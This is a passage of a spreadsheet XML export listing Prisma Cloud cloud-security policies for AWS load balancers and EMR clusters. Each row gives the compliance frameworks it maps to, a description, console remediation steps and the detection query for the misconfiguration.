(ISM)-clone, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, MLPS 2.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27001:2022, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v4.0.12, Copy of ACSC Information Security Manual (ISM)-clone, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02</t>
        </is>
      </c>
      <c r="B1911" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1911" s="2" t="inlineStr"/>
      <c r="D1911" t="n">
        <v>0</v>
      </c>
      <c r="E1911" t="n">
        <v>9</v>
      </c>
      <c r="F1911" t="n">
        <v>0</v>
      </c>
      <c r="G1911" t="b">
        <v>1</v>
      </c>
      <c r="H19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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1911" t="inlineStr">
        <is>
          <t>aws-elbv2</t>
        </is>
      </c>
      <c r="K1911" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer v2 (ELBv2) listener that allow connection requests over HTTP</t>
        </is>
      </c>
      <c r="L1911" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1911" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1911" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1911" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1911" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1911" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R1911" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S1911" t="inlineStr"/>
      <c r="T1911" t="b">
        <v>0</v>
      </c>
      <c r="U1911" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1911" t="inlineStr">
        <is>
          <t>aws-elbv2-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1911" t="inlineStr">
        <is>
          <t>This policy identifies Elastic Load Balancers v2 (ELBv2) listener that are configured to accept connection requests over HTTP instead of HTTPS. As a best practice, use the HTTPS protocol to encrypt the communication between the application clients and the application load balancer.</t>
        </is>
      </c>
      <c r="X1911" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. Select the region, from the region drop-down, in which the alert is generated
3. Navigate to EC2 dashboard
4. Click on 'Load Balancers' (Left Panel)
5. Select the reported ELB
6. Click on 'Listeners' tab
7.'Edit' the 'Listener ID' rule that uses HTTP
8. Select 'HTTPS' in the 'Protocol : port' section, Choose appropriate Default action, Security policy and Default SSL certificate parameters as per your requirement.
9. Click on 'Update' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/networking-29
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/networking-29</t>
        </is>
      </c>
      <c r="Y1911" t="inlineStr"/>
      <c r="Z1911" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elbv2-describe-load-balancers' AND json.rule = state.code contains active and listeners[?any(protocol equals HTTP and defaultActions[?any(type equals redirect and redirectConfig.protocol equals HTTPS)] does not exist )] exists
{"category":"Networking","resourceTypes":["aws_lb_listener"]}</t>
        </is>
      </c>
      <c r="AA1911" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1911" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1911" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-345-CKV_AWS_2</t>
        </is>
      </c>
      <c r="AD1911" t="b">
        <v>1</v>
      </c>
      <c r="AE1911" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1911" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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1" t="inlineStr">
        <is>
          <t>81c50f65-faa1-4d66-b8e2-d26eaeb08447</t>
        </is>
      </c>
      <c r="AI1911" t="inlineStr">
        <is>
          <t>b50c6eb5-eb27-4a28-978d-11984bf326c5</t>
        </is>
      </c>
      <c r="AJ1911" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1911" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1912">
      <c r="A1912" t="inlineStr"/>
      <c r="B1912" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1912" s="2" t="inlineStr"/>
      <c r="D1912" t="inlineStr"/>
      <c r="E1912" t="inlineStr"/>
      <c r="F1912" t="inlineStr"/>
      <c r="G1912" t="b">
        <v>1</v>
      </c>
      <c r="H19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12" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1912" t="inlineStr">
        <is>
          <t>aws-elbv2</t>
        </is>
      </c>
      <c r="K1912" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer v2 (ELBv2) with deletion protection disabled</t>
        </is>
      </c>
      <c r="L1912" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1912" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1912" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1912" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1912" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1912" t="inlineStr"/>
      <c r="R1912" t="inlineStr"/>
      <c r="S1912" t="inlineStr"/>
      <c r="T1912" t="b">
        <v>0</v>
      </c>
      <c r="U1912" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1912" t="inlineStr">
        <is>
          <t>aws-elbv2-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1912" t="inlineStr">
        <is>
          <t>This policy identifies Elastic Load Balancers v2 (ELBv2), which are configured with the deletion protection feature disabled.
AWS Elastic Load Balancer automatically distributes incoming traffic across multiple targets, such as EC2 instances, containers, and IP addresses, to improve the availability and fault tolerance of applications. To prevent your load balancer from being deleted accidentally, you can enable deletion protection.
It is recommended to enable deletion protection on AWS Elastic load balancers to protect them from being deleted accidentally.</t>
        </is>
      </c>
      <c r="X1912" t="inlineStr">
        <is>
          <t>To enable deletion protection on load balancer:
1. Log in to the AWS console. Navigate to EC2 dashboard
2. Select 'Load Balancers'
3. Click on the reported Load Balancer
4. On the 'Attributes' tab, choose 'Edit'
5. On the Edit load balancer attributes page, select 'Enable' for 'Delete Protection'
6. Click on 'Save' to save your changes.</t>
        </is>
      </c>
      <c r="Y1912" t="inlineStr"/>
      <c r="Z1912" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elbv2-describe-load-balancers' AND json.rule = ['attributes'].['deletion_protection.enabled'] contains false</t>
        </is>
      </c>
      <c r="AA1912" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1912" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1912" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-1239</t>
        </is>
      </c>
      <c r="AD1912" t="b">
        <v>1</v>
      </c>
      <c r="AE1912" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1912" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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12" t="inlineStr">
        <is>
          <t>1c82c94d-2df0-4e28-8a3f-2e8d0eb804d5</t>
        </is>
      </c>
      <c r="AI1912" t="inlineStr">
        <is>
          <t>c101285b-761e-4691-b4ce-cf673079996b</t>
        </is>
      </c>
      <c r="AJ1912" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1912" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1913">
      <c r="A1913" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, Insurance Regulatory And Development Authority Of India, DORA, TX-RAMP Level 2, SOC 2, SOC 2, CIS Controls v8.1</t>
        </is>
      </c>
      <c r="B1913" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1913" s="2" t="inlineStr"/>
      <c r="D1913" t="inlineStr"/>
      <c r="E1913" t="inlineStr"/>
      <c r="F1913" t="inlineStr"/>
      <c r="G1913" t="b">
        <v>1</v>
      </c>
      <c r="H19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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1913" t="inlineStr">
        <is>
          <t>aws-elbv2</t>
        </is>
      </c>
      <c r="K1913" t="inlineStr">
        <is>
          <t>AWS Application Load Balancer (ALB) is not configured to drop HTTP headers</t>
        </is>
      </c>
      <c r="L1913" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1913" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1913" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1913" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1913" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1913" t="inlineStr">
        <is>
          <t>Control 3</t>
        </is>
      </c>
      <c r="R1913" t="inlineStr">
        <is>
          <t>Safeguard 3.1 : Establish and Maintain a Data Management Process</t>
        </is>
      </c>
      <c r="S1913" t="inlineStr"/>
      <c r="T1913" t="b">
        <v>0</v>
      </c>
      <c r="U1913" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1913" t="inlineStr">
        <is>
          <t>aws-elbv2-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1913" t="inlineStr">
        <is>
          <t>This policy identifies AWS Application Load Balancers that are not configured to drop HTTP headers.
AWS Application Load Balancers distribute incoming HTTP/HTTPS traffic across multiple targets such as EC2 instances, containers, and Lambda functions, based on routing rules and health checks. By default, ALBs are not configured to drop invalid HTTP header values, which can leave the load balancer vulnerable to HTTP desync attacks. HTTP desync attacks manipulate request headers to exploit inconsistencies between servers, potentially leading to security vulnerabilities and unauthorized access.
It is recommended to enable this feature, to prevent the load balancer from forwarding requests with invalid HTTP headers to mitigate potential security vulnerabilities.</t>
        </is>
      </c>
      <c r="X1913" t="inlineStr">
        <is>
          <t>To configure the application load balancer to drop invalid HTTP header fields, perform the following actions:
1. Open the Amazon EC2 console at https://console.aws.amazon.com/ec2/
2. In the navigation pane, choose 'Load balancers'
3. Choose the reported Application Load Balancer 
4. From 'Actions', choose 'Edit load balancer attributes' 
5. Enable the 'Drop invalid header fields’ option
6. Click on 'Save changes'</t>
        </is>
      </c>
      <c r="Y1913" t="inlineStr"/>
      <c r="Z1913" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elbv2-describe-load-balancers' AND json.rule = type equals application and ['attributes'].['routing.http.drop_invalid_header_fields.enabled'] is false</t>
        </is>
      </c>
      <c r="AA1913" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1913" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1913" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-1157</t>
        </is>
      </c>
      <c r="AD1913" t="b">
        <v>1</v>
      </c>
      <c r="AE1913" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1913" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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3" t="inlineStr">
        <is>
          <t>79b84113-d47b-412f-9bd0-381cd4a0d50e</t>
        </is>
      </c>
      <c r="AI1913" t="inlineStr">
        <is>
          <t>3963e487-1798-4b86-9f15-c1ccd3aa5db0</t>
        </is>
      </c>
      <c r="AJ1913" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1913" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1914">
      <c r="A1914" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, Cybersecurity Maturity Model Certification (CMMC) v.1.02, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, NIST 800-53 Rev4, Fedramp (Moderate), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, MLPS 2.0 (Level 2), ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, PCI DSS v4.0, ITSG-33, Risk Management in Technology (RMiT), MLPS 2.0, ISO/IEC 27018:2019, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, DORA, PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, NIST 800-53 Rev 5, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, TX-RAMP Level 2, CDC NIST 800-53 Rev4, HIPAA, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, MLPS 2.0 (Level 3), CRI Profile v2.0, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, PCI DSS v4.0, NIST SP 800-171 Revision 2, PCI DSS v3.2.1, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B1914" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1914" s="2" t="inlineStr"/>
      <c r="D1914" t="inlineStr"/>
      <c r="E1914" t="inlineStr"/>
      <c r="F1914" t="inlineStr"/>
      <c r="G1914" t="b">
        <v>1</v>
      </c>
      <c r="H19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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1914" t="inlineStr">
        <is>
          <t>aws-emr</t>
        </is>
      </c>
      <c r="K1914" t="inlineStr">
        <is>
          <t>AWS EMR cluster is not enabled with data encryption at rest</t>
        </is>
      </c>
      <c r="L1914" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1914" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1914" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1914" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1914" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1914" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1914" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S1914" t="inlineStr"/>
      <c r="T1914" t="b">
        <v>0</v>
      </c>
      <c r="U1914" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1914" t="inlineStr">
        <is>
          <t>aws-emr-describe-cluster</t>
        </is>
      </c>
      <c r="W1914" t="inlineStr">
        <is>
          <t>This policy identifies AWS EMR clusters for which data encryption at rest is not enabled. Encryption of data at rest is required to prevent unauthorized users from accessing the sensitive information available on your  EMR clusters and associated storage systems.</t>
        </is>
      </c>
      <c r="X1914" t="inlineStr">
        <is>
          <t>1. Login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For encryption At Rest select the required encryption type ('S3 encryption'/'Local disk encryption'/both) and follow below link for enabling the same.
8. https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-encryption-enable.html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you the new cluster is set up verify its working and terminate the source cluster in order to stop incurring charges for it.
16. On the left menu of EMR dashboard Click 'Clusters', from the list of clusters select the source cluster which is alerted.
17. Click on the 'Terminate' button from the top menu.
18. On the 'Terminate clusters' pop-up, click 'Terminate'.</t>
        </is>
      </c>
      <c r="Y1914" t="inlineStr"/>
      <c r="Z1914" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-emr-describe-cluster' as X; config from cloud.resource where api.name = 'aws-emr-security-configuration' as Y; filter '($.X.status.state does not contain TERMINATING) and ($.X.securityConfiguration equals $.Y.name) and ($.Y.EncryptionConfiguration.EnableAtRestEncryption is false)'; show X;</t>
        </is>
      </c>
      <c r="AA1914" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1914" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1914" t="inlineStr">
        <is>
          <t>PC-AWS-EMR-423</t>
        </is>
      </c>
      <c r="AD1914" t="b">
        <v>1</v>
      </c>
      <c r="AE1914" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1914" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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4" t="inlineStr">
        <is>
          <t>353d0997-a8e7-4b57-8b2c-0772b21ca53f</t>
        </is>
      </c>
      <c r="AI1914" t="inlineStr">
        <is>
          <t>5acfc7c1-17c3-48fa-a6f5-0bed9dd7d8b2</t>
        </is>
      </c>
      <c r="AJ1914" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1914" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1915">
      <c r="A1915" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, NIST 800-53 Rev4, Fedramp (Moderate), CRI Profile v1.2.1, NIST CSF v2.0, Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, PCI DSS v4.0, ITSG-33, NIST CSF v2.0, Risk Management in Technology (RMiT), MLPS 2.0, ISO/IEC 27018:2019, CRI Profile v2.0, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, DORA, PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, NIST 800-53 Rev 5, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, TX-RAMP Level 2, CDC NIST 800-53 Rev4, HIPAA, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, MLPS 2.0 (Level 3), CRI Profile v2.0, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, CRI Profile v1.2.1, PCI DSS v4.0, NIST SP 800-171 Revision 2, PCI DSS v3.2.1, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B1915" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1915" s="2" t="inlineStr"/>
      <c r="D1915" t="inlineStr"/>
      <c r="E1915" t="inlineStr"/>
      <c r="F1915" t="inlineStr"/>
      <c r="G1915" t="b">
        <v>1</v>
      </c>
      <c r="H19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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1915" t="inlineStr">
        <is>
          <t>aws-emr</t>
        </is>
      </c>
      <c r="K1915" t="inlineStr">
        <is>
          <t>AWS EMR cluster is not configured with SSE KMS for data at rest encryption (Amazon S3 with EMRFS)</t>
        </is>
      </c>
      <c r="L1915" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1915" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1915" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1915" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1915" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1915" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1915" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S1915" t="inlineStr"/>
      <c r="T1915" t="b">
        <v>0</v>
      </c>
      <c r="U1915" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1915" t="inlineStr">
        <is>
          <t>aws-emr-describe-cluster</t>
        </is>
      </c>
      <c r="W1915" t="inlineStr">
        <is>
          <t>This policy identifies EMR clusters which are not configured with Server Side Encryption(SSE KMS) for data at rest encryption of Amazon S3 with EMRFS. As a best practice, use SSE-KMS for server side encryption to encrypt the data in your EMR cluster and ensure full control over your data.</t>
        </is>
      </c>
      <c r="X1915" t="inlineStr">
        <is>
          <t>1. Log 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For encryption At Rest click the checkbox for 'Enable at-rest encryption for EMRFS data in Amazon S3'
8. From the dropdown 'Default encryption mode' select 'SSE-KMS'. Follow below link for configuration steps.
https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-encryption-enable.html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you the new cluster is set up verify its working and terminate the source cluster in order to stop incurring charges for it.
16. On the left menu of EMR dashboard Click 'Clusters', from the list of clusters select the source cluster which is alerted
17. Click on the 'Terminate' button from the top menu
18. On the 'Terminate clusters' pop-up, click 'Terminate'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-emr-cluster-security-configuration-encryption-uses-sse-kms
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-emr-cluster-security-configuration-encryption-uses-sse-kms</t>
        </is>
      </c>
      <c r="Y1915" t="inlineStr"/>
      <c r="Z1915" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-emr-describe-cluster' as X; config from cloud.resource where api.name = 'aws-emr-security-configuration' as Y; filter '($.X.status.state does not contain TERMINATING) and ($.X.securityConfiguration contains $.Y.name) and ($.Y.EncryptionConfiguration.EnableAtRestEncryption is true) and ($.Y.EncryptionConfiguration.AtRestEncryptionConfiguration.S3EncryptionConfiguration exists) and ($.Y.EncryptionConfiguration.AtRestEncryptionConfiguration.S3EncryptionConfiguration.EncryptionMode contains SSE) and ($.Y.EncryptionConfiguration.AtRestEncryptionConfiguration.S3EncryptionConfiguration.EncryptionMode does not contain KMS)' ; show X;
{"category":"General","resourceTypes":["aws_emr_security_configuration"]}</t>
        </is>
      </c>
      <c r="AA1915" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1915" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1915" t="inlineStr">
        <is>
          <t>PC-AWS-EMR-420-CKV_AWS_171</t>
        </is>
      </c>
      <c r="AD1915" t="b">
        <v>1</v>
      </c>
      <c r="AE1915" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1915" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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5" t="inlineStr">
        <is>
          <t>66958003-19e7-4aac-bed2-1d488b25702b</t>
        </is>
      </c>
      <c r="AI1915" t="inlineStr">
        <is>
          <t>2e09b9cf-5269-4eb3-bf4b-c4f7c8a76bc2</t>
        </is>
      </c>
      <c r="AJ1915" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1915" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1916">
      <c r="A1916" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, CRI Profile v1.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, jneytchev-fedramp-low, Fedramp (Low), ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) 